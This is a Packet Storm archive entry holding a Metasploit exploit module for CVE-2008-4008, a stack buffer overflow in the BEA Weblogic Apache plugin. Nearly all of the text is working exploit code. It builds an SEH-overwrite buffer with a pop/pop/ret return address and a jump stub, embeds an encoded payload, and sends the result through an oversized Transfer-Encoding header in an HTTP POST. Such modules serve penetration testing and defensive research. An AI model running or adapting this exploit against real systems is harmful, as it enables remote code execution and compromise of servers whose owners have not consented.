BEA Weblogic Transfer-Encoding Buffer Overflow

2009-11-26T00:00:00
ID PACKETSTORM:83221
Type packetstorm
Reporter Pusscat
Modified 2009-11-26T00:00:00

Description

                                        
                                            `##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',  
'Description' => %q{  
This module exploits a stack based buffer overflow in the BEA  
Weblogic Apache plugin. This vulnerability exists in the   
error reporting for unknown Transfer-Encoding headers.   
You may have to run this twice due to timing issues with handlers.  
},  
'Author' => 'pusscat',  
'References' =>  
[  
[ 'CVE', '2008-4008' ],  
[ 'OSVDB', '49283' ],  
[ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'],  
  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},  
'Privileged' => true,  
'Platform' => 'win',  
'Payload' =>  
{  
'Space' => 500,  
'BadChars' => "\x00\x0d\x0a",  
'StackAdjustment' => -1500,  
  
},  
'Targets' =>   
[  
[ 'Windows Apache 2.2 version Universal',  
{  
'Ret' => 0x1001f4d6, #pop/pop/ret  
}  
],  
],  
'DisclosureDate' => 'Sept 09 2008',  
'DefaultTarget' => 0))  
register_options( [ Opt::RPORT(80) ], self.class )  
end  
  
def exploit  
sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars)  
sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V')  
sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"  
sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded  
  
request =   
"POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " +  
sploit +  
"\r\n\r\n"  
  
handler  
connect  
sock.put(request);  
  
disconnect  
end  
  
end  
  
`